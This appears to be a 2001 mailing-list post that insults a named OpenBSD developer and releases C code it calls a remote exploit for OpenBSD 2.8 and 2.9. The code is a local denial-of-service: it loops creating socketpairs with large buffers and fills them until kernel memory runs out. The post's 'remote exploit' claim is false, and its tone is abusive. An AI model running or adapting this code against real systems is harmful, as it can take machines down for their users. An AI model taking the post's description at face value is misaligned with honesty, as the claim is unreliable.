proof of exploited code

[Fsck Theo Dumbraadt <fscktheo () broken org>]

This code shows a remote exploit for opensbsd versions 2.8 and 2.9
and can now be released to the public to break theo's 4 years without
remote exploits sayings. I wrote it while people told me it could not
happen on the list so here is your proofs bitch.


//
// peewee.c
// peewee herman prove of consept this code will show all of the
// world how vulnirable OpenBSD is and how Theo Dumbraadt is
// not more than a liar copyraadt 2001 by Jigglypuff
// http://home.online.no/~wiighome/ninasiden/Jigglypuff.jpg
// this proggie is GPL licensed to those who use it keep my
// credits and not be a lamer
//

#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      409600

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }

        return(0);
}

* Get your free email at http://www.inbox.net